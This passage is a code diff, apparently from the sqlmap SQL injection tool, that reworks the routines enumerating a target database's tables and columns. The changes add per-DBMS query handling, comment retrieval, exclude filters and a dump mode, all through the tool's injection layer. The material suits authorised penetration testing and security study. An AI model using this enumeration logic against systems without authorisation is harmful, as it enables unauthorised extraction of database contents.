not Backend.isDbms(DBMS.SQLITE): - query += " WHERE %s" % condition - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) + for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, "condition", None)), (getattr(rootQuery.inband, "query2", None), getattr(rootQuery.inband, "condition2", None))): + if not isNoneValue(values) or not query: + break + + if condition: + if not Backend.isDbms(DBMS.SQLITE): + query += " WHERE %s" % condition - if conf.excludeSysDbs: - query += "".join(" AND %s != '%s'" % (condition, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg) + if conf.excludeSysDbs: + infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(infoMsg) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) + else: + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) - if len(dbs) < 2 and ("%s," % condition) in query: - query = query.replace("%s," % condition, "", 1) + if len(dbs) < 2 and ("%s," % condition) in query: + query = query.replace("%s," % condition, "", 1) - values = inject.getValue(query, blind=False, time=False) + if query: + values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - values = filter(None, arrayizeValue(values)) + values = [_ for _ in arrayizeValue(values) if _] if len(values) > 0 and not isListLike(values[0]): values = [(dbs[0], _) for _ in values] for db, table in filterPairValues(values): - db = safeSQLIdentificatorNaming(db) - table = safeSQLIdentificatorNaming(table, True) + table = unArrayizeValue(table) - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) + if not isNoneValue(table): + db = safeSQLIdentificatorNaming(db) + table = safeSQLIdentificatorNaming(table, True).strip() + + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s'" % (comment, unsafeSQLIdentificatorNaming(table)) + if METADB_SUFFIX not in db: + infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get table comments" + singleTimeWarnMessage(warnMsg) + + if db not in kb.data.cachedTables: + kb.data.cachedTables[db] = [table] + else: + kb.data.cachedTables[db].append(table) if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % db + infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(db) + singleTimeLogMessage(infoMsg) continue - infoMsg = "fetching number of tables for " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) + for _query, _count in ((rootQuery.blind.query, rootQuery.blind.count), (getattr(rootQuery.blind, "query2", None), getattr(rootQuery.blind, "count2", None))): + if _query is None: + break - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.count - else: - query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) + infoMsg = "fetching number of tables for " + infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB): + query = _count % unsafeSQLIdentificatorNaming(db) + else: + query = _count - if count == 0: - warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) - warnMsg += "appears to be empty" - logger.warn(warnMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - elif not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " - warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - continue + if count == 0: + warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) + warnMsg += "appears to be empty" + logger.warning(warnMsg) + break - tables = [] + elif not isNumPosStrValue(count): + warnMsg = "unable to retrieve the number of " + warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming(db) + singleTimeWarnMessage(warnMsg) + continue - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) + tables = [] - for index in indexRange: - if Backend.isDbms(DBMS.SYBASE): - query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) - elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.blind.query % index - else: - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES + indexRange = getLimitRange(count, plusOne=plusOne) - table = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if not isNoneValue(table): - kb.hintValue = table - table = safeSQLIdentificatorNaming(table, True) - tables.append(table) + for index in indexRange: + if Backend.isDbms(DBMS.SYBASE): + query = _query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) + elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB): + query = _query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): + query = _query % index + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX, DBMS.FRONTBASE, DBMS.VIRTUOSO): + query = _query % (index, unsafeSQLIdentificatorNaming(db)) + else: + query = _query % (unsafeSQLIdentificatorNaming(db), index) + + table = unArrayizeValue(inject.getValue(query, union=False, error=False)) + + if not isNoneValue(table): + kb.hintValue = table + table = safeSQLIdentificatorNaming(table, True) + tables.append(table) + + if tables: + kb.data.cachedTables[db] = tables + + if conf.getComments: + for table in tables: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s'" % (comment, unsafeSQLIdentificatorNaming(table)) + if METADB_SUFFIX not in db: + infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get table comments" + singleTimeWarnMessage(warnMsg) - if tables: - kb.data.cachedTables[db] = tables - else: - warnMsg = "unable to retrieve the table names " - warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) + break + else: + warnMsg = "unable to retrieve the table names " + warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.warning(warnMsg) if isNoneValue(kb.data.cachedTables): kb.data.cachedTables.clear() @@ -353,19 +451,19 @@ def getTables(self, bruteForce=None): if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) - else: + elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): kb.data.cachedTables[db] = sorted(tables) if tables else tables if kb.data.cachedTables: - for db in kb.data.cachedTables.keys(): + for db in kb.data.cachedTables: kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db])) return kb.data.cachedTables - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -373,15 +471,20 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() + if not conf.db: + errMsg = "unable to retrieve the current " + errMsg += "database name" + raise SqlmapNoneDataException(errMsg) + elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -389,23 +492,26 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.col = conf.col.upper() - colList = conf.col.split(",") + colList = conf.col.split(',') else: colList = [] + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - colList = filter(None, colList) + colList = [_ for _ in colList if _] if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -413,31 +519,36 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if conf.db in kb.data.cachedTables: tblList = kb.data.cachedTables[conf.db] else: - tblList = kb.data.cachedTables.values() + tblList = list(six.itervalues(kb.data.cachedTables)) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] tblList = list(tblList) - else: - errMsg = "unable to retrieve the tables " - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + elif not conf.search: + errMsg = "unable to retrieve the tables" + if METADB_SUFFIX not in conf.db: + errMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return kb.data.cachedColumns - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) + if conf.exclude: + tblList = [_ for _ in tblList if re.search(conf.exclude, _, re.I) is None] + + tblList = filterNone(safeSQLIdentificatorNaming(_, True) for _ in tblList) if bruteForce is None: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) + warnMsg = "information_schema not available, " + warnMsg += "back-end DBMS is MySQL < 5.0" + logger.warning(warnMsg) bruteForce = True - elif Backend.isDbms(DBMS.ACCESS): - errMsg = "cannot retrieve column names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) + elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): + warnMsg = "cannot retrieve column names, " + warnMsg += "back-end DBMS is %s" % Backend.getIdentifiedDbms() + singleTimeWarnMessage(warnMsg) bruteForce = True if bruteForce: @@ -449,7 +560,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): resumeAvailable = True break - if resumeAvailable or colList: + if resumeAvailable and not (conf.freshQueries and not colList): columns = {} for column in colList: @@ -467,12 +578,17 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): return kb.data.cachedColumns - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + if kb.choices.columnExists is None: + message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + kb.choices.columnExists = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): + if kb.choices.columnExists == 'N': + if dumpMode and colList: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): dict((_, None) for _ in colList)} + return kb.data.cachedColumns + else: + return None + elif kb.choices.columnExists == 'Q': raise SqlmapUserQuitException else: return columnExists(paths.COMMON_COLUMNS) @@ -485,7 +601,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " + infoMsg = "fetched table columns from " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) @@ -497,7 +613,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -505,30 +621,49 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = re.sub("column_type", "data_type", query, flags=re.I) + + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery + elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.inband.query % tbl + query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl) - values = inject.getValue(query, blind=False, time=False) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) + query += condQuery + + if dumpMode and colList: + values = [(_,) for _ in colList] + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX not in conf.db: + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + values = None + + if values is None: + values = inject.getValue(query, blind=False, time=False) + if values and isinstance(values[0], six.string_types): + values = [values] if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] while True: - query = rootQuery.inband.query2 % (conf.db, tbl, index) + query = rootQuery.inband.query2 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index) value = unArrayizeValue(inject.getValue(query, blind=False, time=False)) if isNoneValue(value) or value == " ": @@ -538,21 +673,56 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): index += 1 if Backend.isDbms(DBMS.SQLITE): - parseSqliteTableSchema(unArrayizeValue(values)) + if dumpMode and colList: + if conf.db not in kb.data.cachedColumns: + kb.data.cachedColumns[conf.db] = {} + kb.data.cachedColumns[conf.db][safeSQLIdentificatorNaming(conf.tbl, True)] = dict((_, None) for _ in colList) + else: + parseSqliteTableSchema(unArrayizeValue(values)) + elif not isNoneValue(values): table = {} columns = {} for columnData in values: if not isNoneValue(columnData): + columnData = [unArrayizeValue(_) for _ in columnData] name = safeSQLIdentificatorNaming(columnData[0]) if name: + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].column_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) + + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if len(columnData) == 1: columns[name] = None else: + key = int(columnData[1]) if isinstance(columnData[1], six.string_types) and columnData[1].isdigit() else columnData[1] if Backend.isDbms(DBMS.FIREBIRD): - columnData[1] = FIREBIRD_TYPES.get(columnData[1], columnData[1]) + columnData[1] = FIREBIRD_TYPES.get(key, columnData[1]) + elif Backend.isDbms(DBMS.ALTIBASE): + columnData[1] = ALTIBASE_TYPES.get(key, columnData[1]) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + columnData[1] = INFORMIX_TYPES.get(key, columnData[1]) + if notNull: + columnData[1] = "%s NOT NULL" % columnData[1] columns[name] = columnData[1] @@ -567,8 +737,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % conf.db + infoMsg = "fetched table columns from " + infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} @@ -579,7 +749,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -587,63 +757,94 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.count % (conf.db, conf.db, \ - unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.count % (tbl) + query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl) + query += condQuery + + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) query += condQuery elif Backend.isDbms(DBMS.SQLITE): - query = rootQuery.blind.query % tbl - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - parseSqliteTableSchema(value) - return kb.data.cachedColumns + if dumpMode and colList: + if conf.db not in kb.data.cachedColumns: + kb.data.cachedColumns[conf.db] = {} + kb.data.cachedColumns[conf.db][safeSQLIdentificatorNaming(conf.tbl, True)] = dict((_, None) for _ in colList) + else: + query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + parseSqliteTableSchema(unArrayizeValue(value)) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + return kb.data.cachedColumns table = {} columns = {} - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 - - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue + if dumpMode and colList: + count = 0 + for value in colList: + columns[safeSQLIdentificatorNaming(value)] = None + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX not in conf.db: + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + count, index, values = 0, 1, [] + while True: + query = rootQuery.blind.query3 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + + if isNoneValue(value) or value == " ": + break + else: + columns[safeSQLIdentificatorNaming(value)] = None + index += 1 + + if not columns: + errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") + errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX not in conf.db: + errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.error(errMsg) + continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + elif Backend.isDbms(DBMS.H2): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) + query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery) + field = None + elif Backend.isDbms(DBMS.MIMERSQL): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) + query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery) + field = None + elif Backend.isDbms(DBMS.SNOWFLAKE): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) + field = None + elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE): + query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index)) + field = None + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery field = None @@ -652,29 +853,62 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): query += condQuery.replace("[DB]", conf.db) field = condition.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (tbl) + query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl) query += condQuery field = None + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) + query += condQuery + field = condition query = agent.limitQuery(index, query, field, field) column = unArrayizeValue(inject.getValue(query, union=False, error=False)) if not isNoneValue(column): + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].column_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) + + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if not onlyColNames: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, - conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query2 % (tbl, column) + query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column) + elif 